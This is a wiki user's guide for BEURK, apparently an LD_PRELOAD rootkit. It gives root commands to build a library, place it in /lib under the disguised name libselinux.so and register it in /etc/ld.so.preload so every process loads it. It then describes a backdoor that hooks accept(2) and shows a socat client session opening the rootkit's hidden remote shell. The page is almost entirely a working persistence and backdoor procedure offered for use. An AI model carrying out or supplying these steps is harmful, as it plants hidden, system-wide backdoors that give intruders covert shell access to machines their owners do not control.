-
Notifications
You must be signed in to change notification settings - Fork 98
User's Guide
chqrly edited this page May 18, 2015
·
5 revisions
This guide aims to provide you with a step by step set of instuctions to use BEURK.
su -
git clone [email protected]:unix-thrust/beurk.git
cd beurk
./build beurk.conf
mv libselinux.so /lib
echo "/lib/libselinux.so" > /etc/ld.so.preloadEnjoy!!
The remote backdoor's gateway passes through an hooked accept(2) syscall.
So an infected process must be listening on a port (for example ssh, or a web server),
in order to be able to connect to it.
The backdoor only opens if the binded port is withing LOW_BACKDOOR_PORT/HIGH_BACKDOOR_PORT range. Otherwise, it will ignore the connection request.
A small socat based client is available on /utils/socat-client.sh in order to ease
shell connection.
beurk@server:~/beurk$ LD_PRELOAD=./libselinux.so python -m SimpleHTTPServer
3005
Serving HTTP on 0.0.0.0 port 3005 ...
beurk@client:~/beurk$ ./utils/socat-client.sh 127.0.0.1:3005 64835
BEURK password:
Welcome to BEURK's hidden shell ...
beurk@server:~/beurk$ ls
CONTRIBUTING.md TODO.md includes src x.py
LICENSE beurk.conf installer.sh tests
README.md build libselinux.so utils
beurk@server:~/beurk$ exit
logout
beurk@client:~/beurk$